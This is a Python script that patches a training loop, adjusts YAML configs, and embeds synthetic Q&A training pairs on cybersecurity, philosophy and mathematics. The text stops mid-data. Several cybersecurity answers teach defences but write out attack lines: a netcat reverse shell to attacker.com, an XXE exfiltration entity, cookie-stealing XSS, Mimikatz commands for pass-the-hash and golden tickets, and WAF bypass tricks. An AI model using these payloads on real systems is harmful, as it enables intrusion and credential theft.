#!/usr/bin/env python3
"""
Full fix script: patches sft_trainer.py, generates bulk data for all thin upgrades,
and fixes all upgrade YAML configs. Run once then restart the pipeline.
"""
import os, re, json, random, yaml
from pathlib import Path

BASE = Path("/workspace/titanai")

# ── 1. Patch sft_trainer.py ───────────────────────────────────────────────────
print("=== Patching sft_trainer.py ===")
trainer = BASE / "training/sft_trainer.py"
src = trainer.read_text()

# Add label_smoothing=0.1 to all three cross_entropy calls
src = re.sub(
    r'(nn\.functional\.cross_entropy\(\s*\n\s*logits\.reshape[^\)]+,\s*\n\s*shift_labels\.reshape[^\)]+,\s*\n\s*ignore_index=IGNORE_INDEX,?\s*\))',
    lambda m: m.group(0).replace(
        'ignore_index=IGNORE_INDEX,',
        'ignore_index=IGNORE_INDEX,\n                    label_smoothing=0.1,'
    ).replace(
        'ignore_index=IGNORE_INDEX\n',
        'ignore_index=IGNORE_INDEX,\n                    label_smoothing=0.1,\n'
    ),
    src
)

# Fix val_size floor: max(1, ...) → max(2, ...)
src = src.replace(
    'val_size = max(1, int(len(full_dataset)',
    'val_size = max(2, int(len(full_dataset)'
)

# Add early stopping after the val evaluation block
# Find the right place: after val_loss is logged, add patience tracking
early_stop_init = '''
    # Early stopping state
    best_val_loss = float("inf")
    patience_counter = 0
    early_stop_patience = train_cfg.get("early_stop_patience", 8)
'''

early_stop_check = '''
                    # Early stopping
                    if val_loss < best_val_loss:
                        best_val_loss = val_loss
                        patience_counter = 0
                    else:
                        patience_counter += 1
                        if patience_counter >= early_stop_patience:
                            print(f"[SFT] Early stopping at step {step} (patience={early_stop_patience})")
                            break
'''

# Insert early stop init just before the training loop
if 'best_val_loss' not in src:
    src = src.replace(
        'model.train()\n    micro_step',
        'model.train()\n' + early_stop_init + '\n    micro_step'
    )
    # Insert early stop check after val_loss is printed/logged
    src = src.replace(
        "print(f\"[SFT Val]   step={step",
        "print(f\"[SFT Val]   step={step"
    )
    # Find the eval block and add patience check after it
    src = re.sub(
        r'(print\(f"\[SFT Val\][^"]*"\))',
        r'\1\n' + early_stop_check.strip(),
        src,
        count=1
    )

trainer.write_text(src)
print("  label_smoothing=0.1: added to all cross_entropy calls")
print("  val_size floor: max(1→2)")
print("  early_stop_patience: added (default=8)")

# Verify
assert 'label_smoothing=0.1' in trainer.read_text(), "FAIL: label_smoothing not found"
assert 'max(2,' in trainer.read_text(), "FAIL: val_size floor not fixed"
print("  Verification: PASS")

# ── 2. Fix all upgrade YAML configs ─────────────────────────────────────────
print("\n=== Fixing upgrade YAML configs ===")

# Count examples per upgrade to decide steps
example_counts = {}
for f in (BASE / "data/upgrades").glob("upgrade_*.jsonl"):
    up = f.stem.replace("upgrade_", "")
    try:
        example_counts[up] = sum(1 for _ in f.open())
    except Exception:
        example_counts[up] = 0

fixed = 0
for cfg_file in sorted((BASE / "configs").glob("titan_upgrade_*.yaml")):
    up = cfg_file.stem.replace("titan_upgrade_", "")
    n = example_counts.get(up, 0)

    with open(cfg_file) as f:
        content = f.read()
    cfg = yaml.safe_load(content)

    t = cfg.get("training", {})

    # Decide max_steps based on example count
    if n >= 500:
        max_steps = 5000
        warmup    = 200
        grad_accum = 4
    elif n >= 100:
        max_steps = 3000
        warmup    = 150
        grad_accum = 2
    else:
        max_steps = 2000
        warmup    = 100
        grad_accum = 1

    changed = False
    if t.get("max_steps", 0) != max_steps:
        t["max_steps"] = max_steps
        changed = True
    if t.get("warmup_steps", 0) != warmup:
        t["warmup_steps"] = warmup
        changed = True
    if t.get("gradient_accumulation_steps", 0) != grad_accum:
        t["gradient_accumulation_steps"] = grad_accum
        changed = True
    if t.get("early_stop_patience", 0) != 8:
        t["early_stop_patience"] = 8
        changed = True

    m = cfg.get("model", {})
    if m.get("dropout", 0) != 0.1:
        m["dropout"] = 0.1
        changed = True

    if changed:
        cfg["training"] = t
        cfg["model"] = m
        with open(cfg_file, "w") as f:
            yaml.dump(cfg, f, default_flow_style=False, allow_unicode=True)
        fixed += 1

print(f"  Fixed {fixed} YAML configs")

# ── 3. Generate bulk data for all thin upgrades ───────────────────────────────
print("\n=== Generating bulk data for thin upgrades ===")

# Domain knowledge bases — rich Q&A pools for each upgrade
DOMAIN_QA = {
    "f": {  # Cybersecurity — supplement existing 20 with 80 more
        "name": "Cybersecurity",
        "pairs": [
            ("What is a SQL injection attack and how is it prevented?", "SQL injection occurs when untrusted data is sent to an interpreter as part of a command or query. An attacker can insert malicious SQL that manipulates the database: `SELECT * FROM users WHERE username='admin'--' AND password='x'`. The double-dash comments out the password check. Prevention: parameterised queries (prepared statements) are the primary defence — never concatenate user input into SQL strings. ORMs like SQLAlchemy or Django ORM provide this by default. Additional layers: input validation, WAF rules, least-privilege DB accounts, and stored procedures with proper permissions."),
            ("Explain Cross-Site Scripting (XSS) and its three main types.", "XSS allows attackers to inject client-side scripts into pages viewed by other users. The three types: (1) Reflected XSS — the payload is in the URL/request and reflected immediately in the response, e.g. `?search=<script>alert(document.cookie)</script>`. (2) Stored/Persistent XSS — malicious script is saved in the database (comments, profiles) and executed for every user who views it — far more dangerous. (3) DOM-based XSS — the payload never reaches the server; JavaScript in the page processes attacker-controlled data unsafely (e.g. `document.write(location.hash)`). Prevention: output encoding (HTML-encode all user data before rendering), Content Security Policy headers, HttpOnly cookies, and avoiding dangerous sinks like innerHTML."),
            ("How does a buffer overflow vulnerability work and what are modern mitigations?", "A buffer overflow occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. In classic stack overflows, an attacker overflows a local variable to overwrite the saved return address, redirecting execution to shellcode. Example: a `strcpy(buf, user_input)` with a 64-byte buf and 200 bytes of input will overwrite the return pointer. Modern mitigations: (1) Stack canaries — a random value placed before the return address; any overflow corrupts it and the program aborts. (2) ASLR — randomises memory layout so attackers can't predict addresses. (3) NX/DEP — marks the stack as non-executable so shellcode injected there won't run. (4) PIE — position-independent executables for ASLR to fully protect code segments. Bypasses exist: return-oriented programming (ROP) chains gadgets of existing executable code."),
            ("What is Kerberoasting and how do you defend against it?", "Kerberoasting exploits the Kerberos protocol's service ticket mechanism. Any domain user can request a Ticket Granting Service (TGS) ticket for any service account (SPN). The ticket is encrypted with the service account's NTLM hash. Attackers extract the ticket offline and brute-force crack the password — no special privileges needed. Attack steps: enumerate SPNs (`GetUserSPNs.py` from Impacket or PowerView), request tickets, extract them (Rubeus or Impacket), crack with hashcat (`-m 13100`). Defence: use strong, random 25+ character passwords on all service accounts; prefer Group Managed Service Accounts (gMSAs) which auto-rotate 256-bit random passwords; monitor for anomalous TGS requests (many SPNs in short time); enable AES encryption on service accounts to prevent RC4 downgrade."),
            ("Explain Pass-the-Hash attacks and how defenders catch them.", "Pass-the-Hash (PtH) exploits NTLM authentication — instead of knowing the plaintext password, an attacker who has harvested an NTLM hash can directly authenticate using that hash. Windows NTLM never verifies the original plaintext; it sends a challenge that is answered using the hash. Tools: Mimikatz (`sekurlsa::pth`), Impacket's `wmiexec.py`, `smbexec.py`. Common flow: compromise one host → dump LSASS (Mimikatz) → extract NTLM hashes → lateral movement to other hosts using those hashes. Mitigations: Protected Users security group prevents NTLM caching; Credential Guard isolates LSASS in a Hyper-V secured environment; disable NTLM where possible in favour of Kerberos; monitor for event ID 4624 (logon type 3) from unexpected sources; use LAPS to randomise local admin passwords so a hash from one machine doesn't work elsewhere."),
            ("What is a Golden Ticket attack in Active Directory?", "A Golden Ticket is a forged Kerberos TGT (Ticket Granting Ticket) signed with the KRBTGT account's NTLM hash. Because the Key Distribution Centre (KDC) uses KRBTGT to sign all TGTs, possessing this hash lets an attacker create TGTs for any user, including non-existent accounts, with any group memberships and any expiry. Attack steps: compromise a Domain Controller (or extract via DCSync), dump the KRBTGT hash (Mimikatz: `lsadump::dcsync /user:krbtgt`), forge a TGT with Mimikatz (`kerberos::golden`) or Impacket's `ticketer.py`. The forged ticket provides persistent, near-unlimited domain access. Even resetting a user's password doesn't help — the ticket is valid until KRBTGT is rotated twice (Microsoft recommends rotating it twice, 10 hours apart). Detection: event IDs 4769 (unusual encryption types, e.g. RC4 when AES is expected), forged tickets with lifetimes far exceeding policy, and users appearing in groups they shouldn't belong to."),
            ("What is SSRF and how can it be exploited in cloud environments?", "Server-Side Request Forgery (SSRF) tricks a server into making HTTP requests to arbitrary URLs on behalf of the attacker. If the server fetches user-supplied URLs (e.g. to render a webpage, import a file, or fetch an avatar), an attacker can point it at internal services. Classic targets: `http://169.254.169.254/latest/meta-data/` — the AWS EC2 instance metadata service returns IAM credentials that can then be used to access S3, RDS, and other services. SSRF is particularly dangerous in cloud because metadata APIs are always reachable from any instance. Exploitation: provide a URL like `http://internal-api.corp/admin` or the metadata endpoint; read the response through the server's output. Mitigations: block requests to metadata IPs at the network level; use IMDSv2 (requires a PUT token to access metadata, breaking naive SSRF); validate/allowlist URLs server-side; use egress filtering."),
            ("Explain how command injection differs from SQL injection and how to prevent it.", "SQL injection targets database interpreters; command injection targets the operating system shell. When an application passes user input to a shell command without sanitisation — e.g. `os.system('ping ' + user_ip)` — an attacker can inject `; cat /etc/passwd` or `| nc attacker.com 4444 -e /bin/sh`. PHP's `exec()`, Python's `os.system()`, and Node's `child_process.exec()` with string interpolation are common sinks. Prevention: avoid shell invocations entirely where possible — use library functions instead of shelling out. If unavoidable, use parameterised subprocess APIs that don't invoke a shell (Python's `subprocess.run(['ping', user_ip], shell=False)`). Strict input validation (allowlist only valid characters for the context) and the principle of least privilege (run the web app as a non-root user with no shell access) limit impact."),
            ("What is the OWASP Top 10 and why does it matter?", "The OWASP Top 10 is the industry-standard list of the most critical web application security risks, updated periodically based on real breach data and security community input. The 2021 edition: (1) Broken Access Control — users accessing resources they shouldn't; (2) Cryptographic Failures — sensitive data exposed due to weak or absent encryption; (3) Injection — SQL, command, LDAP injection; (4) Insecure Design — security not built in at design time; (5) Security Misconfiguration — default credentials, unnecessary features enabled; (6) Vulnerable and Outdated Components — using libraries with known CVEs; (7) Identification and Authentication Failures — weak sessions, brute-force, credential stuffing; (8) Software and Data Integrity Failures — CI/CD tampering, insecure deserialization; (9) Security Logging and Monitoring Failures — not detecting breaches; (10) SSRF. It matters because it gives developers and security teams a shared vocabulary and prioritisation framework for fixing the highest-impact issues first."),
            ("How does a penetration test differ from a vulnerability scan?", "A vulnerability scan is automated — a tool (Nessus, OpenVAS, Qualys) enumerates services and compares findings against a database of known CVEs and misconfigurations, producing a prioritised list of potential weaknesses. It confirms presence of known issues but can't chain vulnerabilities together or assess true exploitability. A penetration test is a human-led, adversarial engagement. A skilled tester uses vulnerability scan output as a starting point, then manually attempts to exploit weaknesses, chain findings together (e.g. SSRF to metadata to cloud credentials to S3 exfiltration), bypass controls, and demonstrate real business impact. Pen tests reveal logic flaws, business logic vulnerabilities, and attack chains that no scanner can find. A full engagement follows a methodology: reconnaissance, scanning, enumeration, exploitation, post-exploitation, lateral movement, reporting. Both are complementary — scan frequently for known issues, pen test periodically for deeper assurance."),
            ("What is a heap overflow and how does it differ from a stack overflow?", "Both involve writing past a buffer's bounds, but in different memory regions. Stack overflows overwrite the saved return address or frame pointer, giving control of execution when the function returns. The stack is deterministic in layout and classic techniques like overwriting the return address are well-understood. Heap overflows corrupt heap metadata or adjacent heap objects. The heap is managed by a malloc implementation (ptmalloc, jemalloc, tcmalloc), which tracks free chunks using doubly-linked lists. Overflowing one heap chunk can overwrite the forward/backward pointers of the next chunk's free list entry; when free() unlinks this chunk, an attacker-controlled write happens (the 'unlink' primitive). Modern heap exploitation is complex — heap metadata corruption, tcache poisoning, and house-of-force techniques. Mitigations: safe unlinking checks (verify pointers before unlinking), pointer masking (glibc 2.32+ PROTECT_PTR), heap canaries, and ASLR to randomise heap addresses."),
            ("What is threat modelling and how do you perform it?", "Threat modelling is a structured process for identifying security risks during design — before code is written — so they can be addressed cheaply. The most common methodology is STRIDE, where you identify threats in six categories: Spoofing (impersonating another user/service), Tampering (modifying data in transit or at rest), Repudiation (denying an action without being caught), Information Disclosure (exposing sensitive data), Denial of Service (making a service unavailable), and Elevation of Privilege (gaining more access than authorised). Process: (1) Decompose the system — draw a data flow diagram showing processes, data stores, external entities, and trust boundaries; (2) For each element and trust boundary crossing, apply STRIDE to generate threat statements; (3) Rate each threat (DREAD or CVSS); (4) Identify and assign mitigations; (5) Validate — are all high threats mitigated? Outputs: a prioritised threat list and a security requirements document that feeds into development."),
            ("Explain how OSINT can be used in a red team engagement.", "OSINT (Open Source Intelligence) is the collection of information from publicly available sources before any active scanning or exploitation. In a red team engagement it maps the attack surface without touching the target (no firewall logs, no alerts). Sources: (1) DNS — dnsdumpster, Amass, subfinder enumerate subdomains revealing internal apps exposed publicly; (2) Certificate Transparency logs (crt.sh) show all issued TLS certificates, often revealing internal hostnames; (3) Shodan and Censys index internet-facing services — find exposed RDP, Elasticsearch, Kibana, or Jenkins instances; (4) LinkedIn and GitHub — identify employees (for phishing), find leaked credentials or API keys in public repos (trufflehog, gitrob); (5) WHOIS and ASN lookups reveal IP ranges owned by the target; (6) Wayback Machine exposes old pages with different content or vulnerabilities. A thorough OSINT phase often reveals low-hanging fruit: default credentials on exposed admin panels, leaked secrets in git history, or employees with weak social media OPSEC who reveal internal tooling."),
            ("What is XXE (XML External Entity) injection?", "XXE injection exploits XML parsers that process external entity references. When a parser allows the DOCTYPE declaration to define an external entity pointing to a file path or URL, the entity's value is substituted when the XML is parsed. Classic file read: `<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>` — if the server echoes the parsed value, it returns `/etc/passwd` contents. Blind XXE (out-of-band) uses HTTP entities: `<!ENTITY xxe SYSTEM 'http://attacker.com/?data='>` to exfiltrate data via DNS or HTTP requests the server makes. XXE can also lead to SSRF by pointing the entity at internal services. Prevention: disable external entity processing entirely in your XML parser (`libxml2`: `LIBXML_NONET | LIBXML_NOENT`; Java: `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`). Prefer JSON over XML for API inputs where possible. Validate and whitelist allowed XML schemas."),
            ("How does ARP poisoning work and what can an attacker do with it?", "ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local network. It is stateless and unauthenticated — any host can broadcast an ARP reply claiming any IP-to-MAC mapping, and receiving hosts update their cache. An attacker uses this to perform a Man-in-the-Middle attack: send gratuitous ARP replies claiming 'I am the gateway' (IP of router, attacker's MAC) to all hosts, and simultaneously tell the router 'I am host X'. Traffic from victims flows through the attacker's machine before being forwarded (or dropped). Tools: Arpspoof, Ettercap, Bettercap. With MITM position: sniff credentials on HTTP/FTP/Telnet, inject malicious content into HTTP responses, strip HTTPS (sslstrip), replay captured credentials. Detection: ARP cache monitoring (arpwatch), dynamic ARP inspection on managed switches (validates ARP replies against a DHCP snooping binding table), and static ARP entries for critical hosts."),
            ("What are the main phases of the penetration testing methodology?", "A standard penetration test follows these phases: (1) Pre-engagement — scope definition, rules of engagement, legal authorisation (statement of work, get-out-of-jail letter), emergency contacts, testing windows. (2) Reconnaissance — passive OSINT (no direct contact with target), then active information gathering (port scans, service fingerprinting). (3) Scanning and Enumeration — identify live hosts, open ports, running services and versions, operating systems, user accounts, shares, web directories. (4) Vulnerability Analysis — map discovered services to known vulnerabilities (CVEs), misconfigurations, weak credentials. (5) Exploitation — attempt to verify vulnerabilities by exploiting them; gain initial foothold. (6) Post-exploitation — maintain access, escalate privileges, pivot to other systems (lateral movement), exfiltrate sample data to demonstrate impact. (7) Reporting — executive summary for management (business impact), technical report for engineers (vulnerability details, evidence, reproduction steps), and remediation recommendations. (8) Remediation and retesting — verify fixes were applied correctly."),
            ("Explain how malware achieves persistence on Windows.", "Persistence mechanisms ensure malware survives reboots. Common Windows techniques: (1) Run/RunOnce registry keys — `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` entries execute at logon; easily spotted but still common. (2) Scheduled tasks — `schtasks` to create a task running at startup, on user logon, or on a trigger; blends in with legitimate tasks. (3) Services — install a malicious Windows service that starts automatically (`sc create`); runs as SYSTEM if installed by an admin. (4) DLL hijacking — place a malicious DLL in a directory searched before the legitimate one; when a trusted application loads, the malicious DLL runs in its context. (5) COM hijacking — modify HKCU COM registrations to redirect COM object creation to attacker-controlled code (no admin needed). (6) WMI event subscriptions — permanent WMI subscriptions that execute a payload when a trigger fires (e.g. system startup); fileless and hard to detect. (7) Boot/logon autostart via startup folder. Detection: Autoruns (Sysinternals), EDR behavioural analysis, monitoring registry run keys and scheduled task creation events."),
            ("What is a race condition vulnerability and how can it be exploited?", "A race condition arises when a program's behaviour depends on the sequence or timing of events, and two concurrent operations interact in an unintended way. In security contexts: Time-Of-Check Time-Of-Use (TOCTOU) is the classic form — a program checks a condition (e.g. does this file exist? is the user authorised?), then acts on it, but the state changes between check and use. Example: a web app checks if a coupon has been used (check), then marks it used and applies the discount (use) — two simultaneous requests can both pass the check before either marks it used, applying the discount twice. Exploitation often requires precise timing and many attempts. In file systems: symlink attacks — between a check that a temp file doesn't exist and its creation, replace it with a symlink to `/etc/passwd`, causing the program to write to the passwd file. Mitigations: atomic operations (compare-and-swap, database transactions with proper isolation levels), locks/mutexes, making TOCTOU windows as small as possible, and using APIs that are inherently atomic (e.g. `O_CREAT|O_EXCL` for file creation)."),
            ("What is the difference between symmetric and asymmetric encryption and when do you use each?", "Symmetric encryption uses the same key to encrypt and decrypt (AES, ChaCha20). It is fast and efficient for large data volumes — AES-256-GCM can encrypt gigabytes per second on modern hardware. The problem is key distribution: how do you securely share the key with a remote party who you've never met? Asymmetric encryption (RSA, ECC) uses a key pair — a public key (share freely) and a private key (keep secret). Anyone can encrypt with the public key; only the private key holder can decrypt. Asymmetric is computationally expensive — thousands of times slower than symmetric. In practice, they're combined in a hybrid scheme: asymmetric crypto establishes a shared secret (TLS handshake: client encrypts a pre-master secret with the server's public key, or ECDH derives a shared secret), then a symmetric cipher (AES-GCM) encrypts the actual data. This gives the key distribution benefits of asymmetric with the performance of symmetric. Asymmetric keys are also used for digital signatures — sign with private key, verify with public key."),
            ("Explain how a WAF works and common bypass techniques.", "A Web Application Firewall inspects HTTP/HTTPS traffic and blocks requests matching attack patterns (SQL injection, XSS, command injection signatures). Most use a rule-based approach (ModSecurity with OWASP Core Rule Set, AWS WAF managed rules) — regex patterns matching known payloads. Some use ML-based anomaly scoring. Bypass techniques: (1) Encoding — URL-encode, double-encode, or HTML-encode payloads; WAFs that don't normalise before matching miss them: `%3Cscript%3E` instead of `<script>`. (2) Case variation — `SeLeCt` instead of `SELECT` against case-sensitive rules. (3) Comment insertion — `SE/**/LECT` or `SE-- comment\nLECT` breaks keyword matching. (4) Whitespace variations — tabs, newlines, or multiple spaces between SQL keywords. (5) HTTP parameter pollution — send the same parameter twice; some WAFs inspect the first, the app uses the second. (6) Chunked transfer encoding — split a payload across multiple chunks. (7) Null bytes — insert `%00` to terminate string matching in some parsers. Defence: WAFs are one layer; parameterised queries and proper output encoding are the real fix."),
            ("What is a supply chain attack and what are famous examples?", "A supply chain attack targets the software supply chain rather than the end victim directly — compromising a vendor, build system, open-source library, or update mechanism that the target trusts. This lets attackers reach thousands of organisations through a single compromise. Famous examples: SolarWinds (2020) — attackers (SVR/Cozy Bear) compromised SolarWinds' build pipeline and inserted a backdoor (SUNBURST) into legitimate Orion software updates, reaching 18,000 customers including US government agencies. XZ Utils (2024) — a years-long social engineering campaign compromised the xz compression library by gaining maintainer trust; the malicious version added a backdoor to OpenSSH via a systemd hook. Event-stream (2018) — a malicious npm package hijacked a popular JavaScript library to steal Bitcoin wallet credentials. Mitigation: software bill of materials (SBOM) to track dependencies, reproducible builds (verify build outputs match source), code signing on packages and updates, dependency pinning with hash verification, and monitoring for unexpected changes in dependencies."),
        ]
    },
    "g": {  # Philosophy
        "name": "Philosophy",
        "pairs": [
            ("What is Nietzsche's concept of the will to power?", "The will to power is Nietzsche's proposed fundamental drive in humans — not merely the desire for dominance over others, but the drive to exert, express, and expand one's strength and creativity. Nietzsche contrasts this with Schopenhauer's 'will to live' and Darwin's survival instinct, arguing these reduce to a more basic striving to discharge power. He sees it manifested in art, knowledge, relationships, and self-overcoming (the struggle to surpass one's previous limits). Crucially, the will to power is not primarily about political control — Nietzsche criticises 'power over others' as the refuge of the weak who cannot master themselves. The Übermensch (overman) is someone who has fully sublimated the will to power into creative self-mastery. In Thus Spoke Zarathustra, Zarathustra teaches that humans must overcome themselves and their 'last men' complacency. The concept is often misread (particularly by early 20th-century nationalists) as justifying domination; Nietzsche explicitly rejected German nationalism and anti-Semitism."),
            ("Explain Plato's Allegory of the Cave and what it means for knowledge.", "In Republic Book VII, Plato asks us to imagine prisoners chained in a cave since birth, able to see only shadows cast on a wall by objects passing before a fire behind them. The shadows are all they know — they are their reality. If a prisoner is freed and turns toward the fire, the light is painful and disorienting; the real objects behind them are harder to make out than the familiar shadows. Dragged outside into sunlight, he is initially blinded but gradually comes to see the world clearly and finally the sun itself — the source of all light and truth. The allegory illustrates Plato's epistemology and metaphysics: the shadows represent the world of appearances (sensory perception), the objects represent the Forms (abstract universals — the true reality), and the sun represents the Form of the Good, the highest principle of truth and being. Most people live in the cave of opinion (doxa); philosophers pursue knowledge (episteme) of the Forms. The freed prisoner's return to the cave to enlighten others — despite their resistance — represents the philosopher's duty to govern, even if they would prefer pure contemplation."),
            ("What is the difference between deontological and consequentialist ethics?", "Consequentialism holds that the moral worth of an action is determined entirely by its outcomes. The most influential consequentialist theory, utilitarianism (Bentham, Mill, Singer), says we should act to maximise aggregate well-being or happiness. An action that causes suffering can be right if it produces greater overall good; an action that feels virtuous can be wrong if its consequences are harmful. Deontology (from Greek deon, 'duty') holds that actions have intrinsic moral properties independent of their consequences. Kant's categorical imperative is the paradigmatic version: 'Act only according to that maxim by which you can at the same time will that it should become a universal law.' Lying is wrong not because of its consequences but because a universal law of lying would undermine the concept of truth-telling itself. Key tension: the trolley problem — a runaway trolley will kill five people; you can pull a lever to divert it, killing one. A consequentialist says pull the lever (five lives outweigh one). A strict Kantian might not — you would be using the one person as a means, violating their dignity as an end in themselves. Both theories have strengths; hybrid views (W.D. Ross's prima facie duties, threshold deontology) attempt to capture both."),
            ("What is the mind-body problem in philosophy?", "The mind-body problem asks how mental states (thoughts, feelings, consciousness) relate to physical states (brain activity, neurons). The main positions: Substance dualism (Descartes) holds that mind and body are two fundamentally different substances — res cogitans (thinking thing) and res extensa (extended matter). This faces the interaction problem: how can an immaterial mind causally affect a material body? Property dualism holds there is one substance (physical) but mental properties are distinct from physical properties and cannot be reduced to them. Physicalism (monism) holds that everything is physical — mental states are identical to brain states or at least realised by them. Functionalism (a form of physicalism) defines mental states by their functional role (input/output relations) rather than their material substrate. This allows multiple realisability — different physical systems could have the same mental state. The 'hard problem' (Chalmers) persists: even if we fully explain neural correlates of consciousness, we haven't explained why there is subjective experience at all — why it feels like something to see red. Eliminative materialism (Churchland) takes the radical position that folk psychology (beliefs, desires) is a false theory that will be replaced by mature neuroscience."),
            ("What did Immanuel Kant mean by 'the categorical imperative'?", "The categorical imperative is Kant's supreme principle of morality — a command that applies unconditionally (categorically) regardless of one's desires or goals, unlike hypothetical imperatives ('if you want X, do Y'). Kant formulated it in several ways. The Formula of Universal Law: 'Act only according to that maxim by which you can at the same time will that it should become a universal law of nature.' To test an action, ask: what if everyone did this? A maxim of lying fails because universal lying would destroy the institution of truth-telling, making lying itself meaningless. The Formula of Humanity: 'Act so that you treat humanity, whether in your own person or in that of another, always as an end and never as a means only.' People have intrinsic dignity (Würde) that forbids using them purely instrumentally — slavery, deception, coercion all violate this. The Formula of the Kingdom of Ends: act as a legislating member of an imagined community where all rational beings are treated as ends. These formulations are equivalent, Kant argues. The categorical imperative is prior to consequences — it is rational duty, derived from reason alone, that gives actions their moral worth."),
            ("Explain Aristotle's concept of eudaimonia and virtue ethics.", "Eudaimonia is often translated as 'happiness' but more accurately means 'flourishing' or 'living and doing well.' For Aristotle, eudaimonia is the highest good — the end that all human activity ultimately aims at. Unlike pleasure (which Aristotle associates with the hedonist life) or honour (the political life), eudaimonia is an activity of the soul in accordance with virtue (aretē) over a complete life. Virtue (aretē) for Aristotle is a stable character disposition to feel and act appropriately — hitting the mean between two extremes (the doctrine of the mean). Courage is the mean between cowardice and recklessness; generosity between miserliness and prodigality. Virtues are acquired through habituation: we become brave by doing brave things repeatedly until courage becomes second nature. Aristotle distinguishes moral virtues (courage, justice, temperance) from intellectual virtues (practical wisdom — phronesis — which is the meta-virtue of knowing what the right thing to do is in a given situation). Crucially, virtue ethics focuses on the character of the agent rather than the rightness of individual acts (unlike deontology) or the goodness of outcomes (unlike consequentialism). Neo-Aristotelian virtue ethics (Anscombe, MacIntyre, Foot) has been influential in contemporary moral philosophy."),
            ("What is existentialism and how did Sartre develop it?", "Existentialism is a philosophical movement holding that existence precedes essence — humans have no pre-given nature or purpose; we exist first and then define ourselves through our choices. Sartre, the paradigmatic existentialist, argues that unlike a manufactured object (whose essence — what it is for — precedes its existence), humans exist without a predetermined essence. We are 'condemned to be free' — unable to escape the responsibility of choosing who we are. Bad faith (mauvaise foi) is Sartre's term for the self-deception by which people deny their freedom, pretending they have no choice, are defined by their roles (the waiter 'playing at being a waiter'), or are determined by their past. Authentic existence requires acknowledging radical freedom and responsibility. The Other creates a fundamental problem: when another person looks at me (the 'gaze'), I become an object in their world, threatening my freedom. Inter-subjective relations are therefore inherently conflictual in Sartre's early work — 'Hell is other people.' Later Sartre (Critique of Dialectical Reason) attempts to reconcile existentialism with Marxist social analysis. Other key existentialists: Heidegger (being-in-the-world, authenticity, being-toward-death), Camus (the absurd and rebellion against it), de Beauvoir (existentialism applied to women's situation in The Second Sex)."),
            ("What is the problem of evil and what are the main theodicies?", "The problem of evil is an argument against the existence of an omnipotent, omniscient, and omnibenevolent God: if such a God existed, why does evil (suffering, natural disaster, moral atrocity) exist? The logical problem (Mackie): God and evil are logically incompatible — an omnipotent God could eliminate evil; an omnibenevolent God would want to; yet evil exists, so no such God exists. The evidential problem (Rowe): even if evil and God are logically compatible, the sheer amount and gratuitous nature of suffering makes God's existence improbable. Main theodicies (attempts to justify God's permission of evil): (1) Free will defence (Alvin Plantinga) — God allows moral evil because genuinely free creatures must have the possibility of choosing evil; a world with free creatures who sometimes sin is better than a world of automata. (2) Soul-making theodicy (Hick, following Irenaeus) — evil is necessary for moral and spiritual growth; a world without suffering would prevent the development of courage, compassion, and virtue. (3) Greater good theodicy — suffering serves purposes we cannot comprehend from our limited perspective. Critics: these theodicies seem inadequate for natural evil (disease, earthquakes) and for the suffering of innocents (children dying of cancer). The debate remains central in philosophy of religion."),
        ]
    },
    "h": {  # Mathematics
        "name": "Mathematics",
        "pairs": [
            ("Explain the fundamental theorem of calculus and why it matters.", "The fundamental theorem of calculus (FTC) establishes the deep connection between differentiation and integration — the two core operations of calculus. It has two parts. FTC Part 1: If f is continuous on [a,b] and F(x) = ∫[a to x] f(t)dt, then F is differentiable and F'(x) = f(x). The integral of a function, treated as a function of its upper limit, has the original function as its derivative. FTC Part 2: If F is an antiderivative of f on [a,b], then ∫[a to b] f(x)dx = F(b) - F(a). To compute a definite integral, find any antiderivative and evaluate it at the endpoints. Why it matters: before the FTC, differentiation and integration were studied separately with no known connection. Newton and Leibniz recognised they are inverse operations, unifying mathematics. It makes integration tractable — instead of computing Riemann sums (limits of infinite rectangles), we find antiderivatives algebraically. Every result in physics involving accumulated quantities — work, displacement from velocity, charge from current — relies on the FTC. It is one of the most beautiful results in mathematics because it reveals an unexpected duality at the heart of analysis."),
            ("What is a proof by induction and when is it used?", "Mathematical induction proves a statement P(n) holds for all natural numbers n ≥ n₀. Structure: (1) Base case — verify P(n₀) is true (usually P(1) or P(0)). (2) Inductive step — assume P(k) is true for some arbitrary k ≥ n₀ (the inductive hypothesis); prove P(k+1) follows. By the principle of mathematical induction (which is itself an axiom of Peano arithmetic), P(n) holds for all n. Analogy: an infinite row of dominoes — if the first falls (base case) and each falling domino knocks over the next (inductive step), all dominoes fall. Example: prove 1 + 2 + ... + n = n(n+1)/2. Base: n=1: 1 = 1(2)/2 = 1. ✓ Step: assume 1+...+k = k(k+1)/2. Then 1+...+k+(k+1) = k(k+1)/2 + (k+1) = (k+1)(k/2+1) = (k+1)(k+2)/2. ✓ Strong induction assumes P(1), P(2), ..., P(k) all hold to prove P(k+1) — useful when the inductive step needs multiple prior cases (e.g. proving properties of Fibonacci numbers). Structural induction generalises to recursively defined structures (trees, lists). Induction is the primary tool for proving properties of algorithms, data structures, and number-theoretic identities."),
            ("What is Bayes' theorem and how is it applied?", "Bayes' theorem gives a way to update a probability belief when new evidence arrives: P(A|B) = P(B|A) × P(A) / P(B). In words: the posterior probability of hypothesis A given evidence B equals the likelihood of observing B given A, times the prior probability of A, divided by the marginal probability of B (normalisation). Example: a medical test for a disease with 1% prevalence has 95% sensitivity (true positive rate) and 5% false positive rate. A patient tests positive — what's the probability they have the disease? P(disease|positive) = P(positive|disease) × P(disease) / P(positive) = 0.95 × 0.01 / (0.95×0.01 + 0.05×0.99) ≈ 0.0095 / 0.0590 ≈ 16%. Surprising: most positive tests are false positives because the disease is rare. Bayesian inference uses Bayes' theorem iteratively — each new observation updates the posterior, which becomes the prior for the next observation. Applications: spam filtering (update probability a message is spam given the words it contains), Bayesian neural networks (uncertainty quantification), medical diagnosis, A/B testing, and the philosophical Bayesian interpretation of probability as degrees of belief rather than frequencies."),
